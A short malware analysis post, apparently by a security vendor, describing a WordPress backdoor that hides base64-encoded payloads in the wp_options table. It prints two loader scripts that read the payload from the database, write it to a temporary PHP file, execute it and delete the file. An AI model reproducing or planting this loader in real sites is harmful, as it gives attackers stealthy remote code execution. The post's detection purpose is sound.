Functions.php contains backdoor

This malware is very clever, because it’s hiding Malware Data to inside WordPress database and Itself code in themes functions.php file. Hacker/or botnetwork can always send POST data to update or add a new Data to Database.

Same time it puts Malware Data to the PHP script and it loaded, executed and last command it unlink itself again.

This malware hiding inside Theme’s Function.php file.

Functions.php

Functions.php

Data inside database

Also, it base64 encode data to database wp-options table, which is difficult find there.

wp_options

Another thing that text is base64 encoded, but it includes also spaces:

base64 encoded

We found two versions of this malware encrypted data in database:

function-sync.php

include $_SERVER["DOCUMENT_ROOT"]."/wp-config.php";
        $conn = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
        $sql = "SELECT * FROM  ".$table_prefix."options where option_name='function-sync'";
        $result = mysqli_query($conn, $sql);
        while($row = mysqli_fetch_assoc($result)) {
            $data = $row[option_value];
        }
        chmod("/home/malware.expert/public_html/wp-temporary.php", 0644);
        file_put_contents("/home/malware.expert/public_html/wp-temporary.php",base64_decode(str_replace(" ","",$data)));
        include "/home/malware.expert/public_html"."/wp-temporary.php";
        unlink("/home/malware.expert/public_html"."/wp-temporary.php");

content-wp-reload.php

        include $_SERVER["DOCUMENT_ROOT"]."/wp-config.php";
        $conn = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
        $sql = "SELECT * FROM  ".$table_prefix."options where option_name='content-wp-reload'";
        $result = mysqli_query($conn, $sql);
        while($row = mysqli_fetch_assoc($result)) {
            $data = $row[option_value];
        }
        chmod("/home/malware.expert/public_html/wp-temporary.php", 0644);
        file_put_contents("/home/malware.expert/public_html/wp-temporary.php",base64_decode(str_replace(" ","",$data)));
        include "/home/malware.expert/public_html"."/wp-temporary.php";
        unlink("/home/malware.expert/public_html"."/wp-temporary.php");

Malware Expert Signature

Our FREE Malware Expert Signatures found this malware.